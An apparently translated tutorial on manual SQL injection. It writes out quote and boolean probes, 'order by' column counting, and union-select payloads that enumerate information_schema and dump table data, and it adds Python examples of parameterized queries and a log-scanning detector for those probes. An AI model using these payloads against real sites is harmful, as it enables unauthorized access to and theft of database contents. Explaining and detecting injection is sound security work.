
Let's talk about the simple manual SQL injection process

WBOY
Release: 2022-01-28 17:02:47

This article walks through manual SQL injection, including how to determine the injection point and how to determine the injection type. I hope it will be helpful to everyone.


Determine the injection point

1. Single quotation mark method: add a single quotation mark directly after the URL parameter. If the page can no longer be displayed normally and the browser returns some exception information, the link may have a SQL injection vulnerability.

2. and 1=1 / and 1=2 method: append and 1=1 to the GET parameter after the URL; if the page displays normally, replace 1=1 with 1=2. If the page now displays abnormally, the web page has SQL injection.

Judge the injection type

1. Numeric injection: the value of the injected variable is not enclosed in quotation marks, for example

select * from user where id=$id;

2. Character injection: the injected variable is wrapped in quotation marks, for example

select * from user where username='$username';

Be sure to close the quotation marks when injecting.
3. Search injection: the injected variable sits inside a LIKE pattern, for example

select * from user where username like '%$pass%';

The constructed SQL statement becomes

select * from user where username like '%$pass%' union select statement '%%';

That is, the submitted variable is pass%' union select statement '%, so that the quotation marks are closed on both sides.
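To show, from the defender's side, why the two tests above behave as they do and how binding parameters removes the difference, here is an added example (not from the article) that builds the article's three query shapes both by string concatenation and with parameters, using Python's sqlite3 against a constructed in-memory table; the table contents and function names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the article's "user" table (not a real dataset).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE user(id INTEGER, username TEXT);
INSERT INTO user VALUES (1, 'alice'), (2, 'bob'), (3, 'carol');
""")

def run(sql, params=()):
    """Execute a query; return its rows, or the error text a broken query would surface."""
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"

# Vulnerable builders: the article's three query shapes with the variable pasted in as text.
def numeric_unsafe(id_):
    return run(f"select * from user where id={id_}")

def char_unsafe(username):
    return run(f"select * from user where username='{username}'")

def search_unsafe(pass_):
    return run(f"select * from user where username like '%{pass_}%'")

# Hardened builders: the same queries with the value bound as a parameter, so it can
# never close a quote or append SQL; the LIKE wildcards are added inside the SQL itself.
def numeric_safe(id_):
    return run("select * from user where id=?", (id_,))

def char_safe(username):
    return run("select * from user where username=?", (username,))

def search_safe(pass_):
    return run("select * from user where username like '%' || ? || '%'", (pass_,))

def probe_single_quote(builder, base):
    """Article test 1: append a single quote and check whether the query breaks."""
    return builder(base + "'")

def probe_boolean(builder, base):
    """Article test 2: 'and 1=1' vs 'and 1=2' on a numeric point; the results must differ."""
    return builder(f"{base} and 1=1"), builder(f"{base} and 1=2")

if __name__ == "__main__":
    print(probe_single_quote(char_unsafe, "bob"), "|", probe_single_quote(char_safe, "bob"))
    print(probe_boolean(numeric_unsafe, "2"), "|", probe_boolean(numeric_safe, "2"))
```

On the concatenated builders the single quote turns into a syntax error and 1=1 versus 1=2 changes the result set, which is exactly the signal the two tests look for; on the parameterized builders both probes are just literal values and return the same empty result.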

Determine the injection point submission method

Determine whether the injection point submission method is get, post, or cookie through packet capture and other methods.

Use order by to query fields

Use the order by statement to find out how many fields the query returns. The number of fields is determined by repeated attempts: for example, when order by 9 is entered the page reports an error, and when order by 8 is entered the page displays normally, so the query has 8 fields.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed (id = ' order by 3 '--):
That is, the query statement becomes: select * from user where id='' order by 3 '--'

Use a union query to query the current database, user, and version information

Use the union select statement to query the current user user(), the current database database(), the database version version(), the server operating system @@version_compile_os and other information.
The version is very important: if it is 5.0 or above, the information_schema library can be used to query the desired information easily.
Construction statement:

select * from user where id='' union select user(),database(),version()+--+;

Query the tables, columns and values ​​in the current database

In MySQL 5.0 and above, the built-in information_schema library stores the names of all tables and columns in the database.
Next, look up the tables of the current database found by the query in step 5 (for example, the database is database_1).
information_schema.tables: a table that records the names of all tables in the database.
The constructed query statement is as follows:

select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

The result of the query is the table names in the current database found in step 5.
information_schema.columns: records the column names of all tables in the database.
Next, query the column names based on the table name obtained above (for example, the table is table_1); construct the statement as follows:

select * from user where id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

After the column names are known, the data stored in the table can be read directly through a union query (for example, the column names found are column_1 and column_2); construct the statement as follows:

select * from user where id='' union select 1,column_1,column_2 from tables;--

In this way the data stored in the specified table of the specified database can be read out.
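As a detection-side counterpart to the procedure above, an added example (not from the article) that scans constructed web-server access-log lines for the probe patterns the article walks through: a trailing single quote, and 1=1 / and 1=2, order by N, union select, and information_schema or user()/database()/version() lookups. The log format, signature names and sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures for the probes this article walks through, applied to decoded query-string values.
SIGNATURES = {
    "quote_probe": re.compile(r"'\s*$|'\s*(?:and|or|union|order)\b", re.I),
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b|\b(?:user|database|version)\(\)", re.I),
}

# Combined-format access log: client IP, then the quoted request line, status and size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d{3} \d+')

def classify_request(request_line):
    """Return the set of signature names matched by a raw 'GET /path?query HTTP/1.1' line."""
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        return set()
    hits = set()
    for _, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decoded once; decode again to catch double encoding
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits.add(name)
    return hits

def scan_access_log(lines):
    """Return (client_ip, request_line, sorted hits) for each log line matching a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = classify_request(m.group(2))
            if hits:
                findings.append((m.group(1), m.group(2), sorted(hits)))
    return findings

# Constructed sample log lines (not from any real server); one client walks the article's steps.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jan/2022:17:02:47 +0800] "GET /news.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/Jan/2022:17:02:51 +0800] "GET /news.php?id=12%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [28/Jan/2022:17:03:02 +0800] "GET /news.php?id=12+and+1%3D2 HTTP/1.1" 200 230',
    '203.0.113.5 - - [28/Jan/2022:17:03:40 +0800] "GET /news.php?id=12+order+by+9 HTTP/1.1" 500 312',
    '203.0.113.5 - - [28/Jan/2022:17:04:15 +0800] "GET /news.php?id=1+union+select+user(),database(),version() HTTP/1.1" 200 987',
    '198.51.100.9 - - [28/Jan/2022:17:05:00 +0800] "GET /news.php?id=13 HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for ip, req, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits, req)
```

A single client producing the quote probe, then boolean probes, then order by, then union select against the same parameter within a few minutes is the sequence to alert on; any one signature alone is noisier.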



Source: csdn.net